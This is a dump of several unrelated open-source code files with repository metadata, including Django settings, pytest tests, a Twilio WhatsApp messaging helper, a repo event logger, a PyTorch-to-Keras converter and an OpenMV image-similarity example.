'myblog.apps.MyblogConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'yhsite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'yhsite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'zh-hans'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
# Note: this static files directory setting is important; only with it can the project access its static files.
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static')
]
| 26.811475 | 91 | 0.697952 |
4a1e6f4b812fd2e84e0875d65fcf8e460f752fa2 | 877 | py | Python | test/functional/create_cache.py | Deimoscoin/deimos | c03a65c72ffe6fadb840bc87e6fd6b4e012def08 | [
"MIT"
] | null | null | null | test/functional/create_cache.py | Deimoscoin/deimos | c03a65c72ffe6fadb840bc87e6fd6b4e012def08 | [
"MIT"
] | null | null | null | test/functional/create_cache.py | Deimoscoin/deimos | c03a65c72ffe6fadb840bc87e6fd6b4e012def08 | [
"MIT"
] | 1 | 2018-06-12T00:50:01.000Z | 2018-06-12T00:50:01.000Z | #!/usr/bin/env python3
# Copyright (c) 2009-2019 The Bitcoin Core developers
# Copyright (c) 2014-2019 The DeimOS Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Create a blockchain cache.
Creating a cache of the blockchain speeds up test execution when running
multiple functional tests. This helper script is executed by test_runner when multiple
tests are being run in parallel.
"""
from test_framework.test_framework import DeimOSTestFramework
class CreateCache(DeimOSTestFramework):
# Test network and test nodes are not required:
def set_test_params(self):
self.num_nodes = 0
self.supports_cli = True
def setup_network(self):
pass
def run_test(self):
pass
if __name__ == '__main__':
CreateCache().main()
| 29.233333 | 86 | 0.743444 |
4a1e7032170e3b0812a444de4232bb975f765aec | 1,110 | py | Python | key_store/tests/test_helpers.py | rimaddo/key-store | 7003c8425ea3139c2ddb47414a0a5be51aa5cde9 | [
"MIT"
] | null | null | null | key_store/tests/test_helpers.py | rimaddo/key-store | 7003c8425ea3139c2ddb47414a0a5be51aa5cde9 | [
"MIT"
] | null | null | null | key_store/tests/test_helpers.py | rimaddo/key-store | 7003c8425ea3139c2ddb47414a0a5be51aa5cde9 | [
"MIT"
] | null | null | null | from collections import namedtuple
from typing import List, Type
import pytest
from key_store.helpers import T, get_keys
from key_store.tests.conftest import EXAMPLE_DICT_1, EXAMPLE_OBJ_1, ExampleObj
class ClassicClass(object):
def __init__(self, name: str, value: int) -> None:
self.name = name
self.value = value
NamedTuple = namedtuple('NamedTuple', 'name, value')
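# ClassicClass and NamedTuple deliberately do not expose the interface that
# get_keys() expects (unlike the conftest ExampleObj), so they drive the
# failure-path test below.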
@pytest.mark.parametrize(
"obj, expected_output",
[
(EXAMPLE_OBJ_1, ("name", "date", "value", "repeat_value", "missing_key_value")),
(EXAMPLE_DICT_1, ("name", "date", "value", "repeat_value")),
(ExampleObj, ("name", "date", "value", "repeat_value", "missing_key_value")),
]
)
def test_get_keys__success(obj: Type[T], expected_output: List[str]) -> None:
output = get_keys(obj=obj)
assert output == expected_output
@pytest.mark.parametrize(
"obj",
[
ClassicClass(name="name", value=1),
NamedTuple(name="name", value=1),
]
)
def test_get_keys__failure(obj: Type[T]) -> None:
with pytest.raises(AttributeError):
get_keys(obj=obj)
| 25.813953 | 88 | 0.665766 |
4a1e704650ee69833173030caa929f7affddb82f | 435 | py | Python | utils/gen.py | Ko-oK-OS/Rix | f2949aadfff23a27da9c771282a4c0d8804a1f65 | [
"MIT"
] | 44 | 2021-03-20T02:14:58.000Z | 2022-03-31T03:40:52.000Z | utils/gen.py | Ko-oK-OS/Rix | f2949aadfff23a27da9c771282a4c0d8804a1f65 | [
"MIT"
] | 10 | 2021-05-28T17:00:00.000Z | 2022-02-06T03:14:50.000Z | utils/gen.py | Ko-oK-OS/Rix | f2949aadfff23a27da9c771282a4c0d8804a1f65 | [
"MIT"
] | 4 | 2021-04-28T08:43:35.000Z | 2022-03-18T01:34:28.000Z | import os
import shutil
output_dir = "../bin/"
bin_dir = "../user/target/riscv64gc-unknown-none-elf/debug/"
user_programes = [
"init",
"hello_world",
"sh"
]
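# Walk the cargo build output and copy each built user program into ../bin/.
# Note: this assumes output_dir already exists; os.makedirs(output_dir, exist_ok=True)
# could be added beforehand if that is not guaranteed.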
for (root, dirs, files) in os.walk(bin_dir):
for f in files:
if f in user_programes:
shutil.copy(src = bin_dir + f, dst = output_dir + f)
print("copy file form" + bin_dir + f + " to " + output_dir + f + "\n")
print("success.")
| 22.894737 | 82 | 0.588506 |
4a1e70d147363004a038345bac41ef92ae04c01c | 1,118 | py | Python | sendsms.py | belelaritra/W-ambulance | ecda7e7789143e4b72b1393a15a035f33cf85474 | [
"MIT"
] | 4 | 2021-09-03T07:30:29.000Z | 2021-12-10T10:54:57.000Z | sendsms.py | belelaritra/W-ambulance | ecda7e7789143e4b72b1393a15a035f33cf85474 | [
"MIT"
] | null | null | null | sendsms.py | belelaritra/W-ambulance | ecda7e7789143e4b72b1393a15a035f33cf85474 | [
"MIT"
] | 5 | 2021-09-03T07:01:30.000Z | 2022-02-24T09:58:30.000Z | # Download the helper library from https://www.twilio.com/docs/python/install
import os
from twilio.rest import Client
# Find your Account SID and Auth Token at twilio.com/console
# and set the environment variables. See http://twil.io/secure
account_sid = "__________YOUR ACCOUNT SID___________"
auth_token = "____________YOUR ACCCOUNT TOKEN______________"
client = Client(account_sid, auth_token)
# ================= Send Message
def sendmessage(to,msg):
message = client.messages.create(
from_='whatsapp:+14155238886',
#body='Hey, I just met you, and this is crazy...',
body=str(msg),
status_callback='http://postb.in/1234abcd',
# to='whatsapp:+918420840551'
to='whatsapp:+91'+str(to)
)
    print(message.status)
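# Example usage (illustrative -- the recipient number and message are placeholders):
#   sendmessage("9876543210", "Your ambulance is on the way.")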
# ================= Send Location Type Message
def sendmsglocation(to,msg,latitude,longitude):
message = client.messages \
.create(
from_='whatsapp:+14155238886',
body=str(msg),
persistent_action=['geo:'+str(latitude)+','+str(longitude)],
to='whatsapp:+91'+str(to)
)
print(message.Status)
| 31.942857 | 77 | 0.661896 |
4a1e7193614b6d0b555ffbe65c6655b9140e0332 | 5,810 | py | Python | event_log.py | sambacha/repo | e4d8f5a2f332854acb140b22f1b96fd06c42b66e | [
"Apache-2.0"
] | 1 | 2021-12-11T01:57:58.000Z | 2021-12-11T01:57:58.000Z | event_log.py | sambacha/repo | e4d8f5a2f332854acb140b22f1b96fd06c42b66e | [
"Apache-2.0"
] | null | null | null | event_log.py | sambacha/repo | e4d8f5a2f332854acb140b22f1b96fd06c42b66e | [
"Apache-2.0"
] | null | null | null | # -*- coding:utf-8 -*-
#
# Copyright (C) 2017 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import json
import multiprocessing
TASK_COMMAND = "command"
TASK_SYNC_NETWORK = "sync-network"
TASK_SYNC_LOCAL = "sync-local"
class EventLog(object):
"""Event log that records events that occurred during a repo invocation.
Events are written to the log as a consecutive JSON entries, one per line.
Each entry contains the following keys:
- id: A ('RepoOp', ID) tuple, suitable for storing in a datastore.
The ID is only unique for the invocation of the repo command.
- name: Name of the object being operated upon.
- task_name: The task that was performed.
- start: Timestamp of when the operation started.
- finish: Timestamp of when the operation finished.
- success: Boolean indicating if the operation was successful.
- try_count: A counter indicating the try count of this task.
Optionally:
- parent: A ('RepoOp', ID) tuple indicating the parent event for nested
events.
Valid task_names include:
- command: The invocation of a subcommand.
- sync-network: The network component of a sync command.
- sync-local: The local component of a sync command.
Specific tasks may include additional informational properties.
"""
def __init__(self):
"""Initializes the event log."""
self._log = []
self._parent = None
def Add(
self,
name,
task_name,
start,
finish=None,
success=None,
try_count=1,
kind="RepoOp",
):
"""Add an event to the log.
Args:
name: Name of the object being operated upon.
task_name: A sub-task that was performed for name.
start: Timestamp of when the operation started.
finish: Timestamp of when the operation finished.
success: Boolean indicating if the operation was successful.
try_count: A counter indicating the try count of this task.
kind: The kind of the object for the unique identifier.
Returns:
A dictionary of the event added to the log.
"""
event = {
"id": (kind, _NextEventId()),
"name": name,
"task_name": task_name,
"start_time": start,
"try": try_count,
}
if self._parent:
event["parent"] = self._parent["id"]
if success is not None or finish is not None:
self.FinishEvent(event, finish, success)
self._log.append(event)
return event
def AddSync(self, project, task_name, start, finish, success):
"""Add a event to the log for a sync command.
Args:
project: Project being synced.
task_name: A sub-task that was performed for name.
One of (TASK_SYNC_NETWORK, TASK_SYNC_LOCAL)
start: Timestamp of when the operation started.
finish: Timestamp of when the operation finished.
success: Boolean indicating if the operation was successful.
Returns:
A dictionary of the event added to the log.
"""
event = self.Add(project.relpath, task_name, start, finish, success)
if event is not None:
event["project"] = project.name
if project.revisionExpr:
event["revision"] = project.revisionExpr
if project.remote.url:
event["project_url"] = project.remote.url
if project.remote.fetchUrl:
event["remote_url"] = project.remote.fetchUrl
try:
event["git_hash"] = project.GetCommitRevisionId()
except Exception:
pass
return event
def GetStatusString(self, success):
"""Converst a boolean success to a status string.
Args:
success: Boolean indicating if the operation was successful.
Returns:
status string.
"""
return "pass" if success else "fail"
def FinishEvent(self, event, finish, success):
"""Finishes an incomplete event.
Args:
event: An event that has been added to the log.
finish: Timestamp of when the operation finished.
success: Boolean indicating if the operation was successful.
Returns:
A dictionary of the event added to the log.
"""
event["status"] = self.GetStatusString(success)
event["finish_time"] = finish
return event
def SetParent(self, event):
"""Set a parent event for all new entities.
Args:
event: The event to use as a parent.
"""
self._parent = event
def Write(self, filename):
"""Writes the log out to a file.
Args:
filename: The file to write the log to.
"""
with open(filename, "w+") as f:
for e in self._log:
json.dump(e, f, sort_keys=True)
f.write("\n")
# An integer id that is unique across this invocation of the program.
_EVENT_ID = multiprocessing.Value("i", 1)
def _NextEventId():
"""Helper function for grabbing the next unique id.
Returns:
A unique, to this invocation of the program, integer id.
"""
with _EVENT_ID.get_lock():
val = _EVENT_ID.value
_EVENT_ID.value += 1
return val
| 30.904255 | 76 | 0.641997 |
4a1e731233b26454551744b1ec12e32b8e19cd47 | 2,671 | py | Python | pytorch_keras_converter/utility/t2k_equivalents/container.py | sonibla/pytorch_keras_converter | 21925b67b6eb3cbbfa8eb6d33f682d57dafd357d | [
"MIT"
] | 17 | 2019-10-01T14:14:18.000Z | 2021-04-25T13:32:24.000Z | pytorch_keras_converter/utility/t2k_equivalents/container.py | sonibla/pytorch_keras_converter | 21925b67b6eb3cbbfa8eb6d33f682d57dafd357d | [
"MIT"
] | null | null | null | pytorch_keras_converter/utility/t2k_equivalents/container.py | sonibla/pytorch_keras_converter | 21925b67b6eb3cbbfa8eb6d33f682d57dafd357d | [
"MIT"
] | 2 | 2019-10-01T14:02:43.000Z | 2019-10-01T14:14:19.000Z | try:
import tensorflow.keras as keras
except ImportError:
try:
import keras
except ImportError:
keras = None
def Sequential(model, file=False):
"""
Converts a torch.nn.Sequential layer
Arguments:
-model:
A LayerRepresentation object of the layer Sequential to convert
-file (bool):
If we want to write the equivalent in a python file
Raises:
-ImportError:
If Keras import failed
Returns:
Keras equivalent.
        If file is True, returns it as a str to put in a python file
        Else, returns the keras layer
        If layers don't have equivalents yet, returns None
"""
if keras is None:
raise ImportError("Could not import keras. Conversion failed !")
name = model.completeName()
if not file:
kerasLayer = keras.Sequential(name=name)
lNumber = -1
# First, we need to sort layers
subLayersDict = dict()
for child in model.children:
if 'keras' not in child.equivalent.keys():
return None
try:
# If layers aren't named,
# PyTorch uses default named '0', '1', '2',...
lNumber = int(child.name)
except ValueError:
lNumber += 1
subLayersDict[lNumber] = child.equivalent['keras']
        subLayersList = [None] * len(subLayersDict)
for number, subLayer in subLayersDict.items():
subLayersList[number] = subLayer
if None in subLayersList:
return None
for subLayer in subLayersList:
kerasLayer.add(subLayer)
return kerasLayer
else:
lNumber = -1
# First, we need to sort layers
subLayersDict = dict()
for child in model.children:
if 'keras' not in child.equivalentTxt.keys():
return None
try:
# If layers aren't named,
# PyTorch uses default named '0', '1', '2',...
lNumber = int(child.name)
except ValueError:
lNumber += 1
subLayersDict[lNumber] = child.equivalentTxt['keras']
        subLayersList = [None] * len(subLayersDict)
for number, subLayerTxt in subLayersDict.items():
subLayersList[number] = subLayerTxt
if None in subLayersList:
return None
outstr = 'keras.Sequential(['
for subLayerTxt in subLayersList:
outstr = outstr + '\n ' + subLayerTxt + ','
outstr = outstr[:-1] + '\n], name=' + name + ')'
return outstr
| 27.822917 | 75 | 0.557844 |
4a1e737062c9cce9a9f96e4cae44dd0c4aacd107 | 1,369 | py | Python | scripts/examples/OpenMV/20-Frame-Differencing/on_disk_structural_similarity.py | jiskra/openmv | a0f321836f77f94d8118910598dcdb79eb784d58 | [
"MIT"
] | 1,761 | 2015-07-10T23:14:17.000Z | 2022-03-30T07:49:49.000Z | scripts/examples/OpenMV/20-Frame-Differencing/on_disk_structural_similarity.py | jiskra/openmv | a0f321836f77f94d8118910598dcdb79eb784d58 | [
"MIT"
] | 487 | 2015-07-07T23:21:20.000Z | 2022-03-30T17:13:22.000Z | scripts/examples/OpenMV/20-Frame-Differencing/on_disk_structural_similarity.py | jiskra/openmv | a0f321836f77f94d8118910598dcdb79eb784d58 | [
"MIT"
] | 882 | 2015-08-01T08:34:19.000Z | 2022-03-30T07:36:23.000Z | # Structural Similarity (SSIM) Example
#
# Note: You will need an SD card to run this example.
#
# This example shows off how to use the SSIM algorithm on your OpenMV Cam
# to detect differences between two images. The SSIM algorithm compares
# 8x8 blocks of pixels between two images to determine a similarity
# score between two images.
import sensor, image, pyb, os, time
# The image has likely changed if the sim.min() is lower than this.
MIN_TRIGGER_THRESHOLD = -0.4
sensor.reset() # Initialize the camera sensor.
sensor.set_pixformat(sensor.RGB565) # or sensor.GRAYSCALE
sensor.set_framesize(sensor.QVGA) # or sensor.QQVGA (or others)
sensor.skip_frames(time = 2000) # Let new settings take effect.
sensor.set_auto_whitebal(False) # Turn off white balance.
clock = time.clock() # Tracks FPS.
if not "temp" in os.listdir(): os.mkdir("temp") # Make a temp directory
print("About to save background image...")
sensor.skip_frames(time = 2000) # Give the user time to get ready.
sensor.snapshot().save("temp/bg.bmp")
print("Saved background image!")
while(True):
clock.tick() # Track elapsed milliseconds between snapshots().
img = sensor.snapshot() # Take a picture and return the image.
sim = img.get_similarity("temp/bg.bmp")
change = "- Change -" if sim.min() < MIN_TRIGGER_THRESHOLD else "- No Change -"
print(clock.fps(), change, sim)
| 38.027778 | 83 | 0.734112 |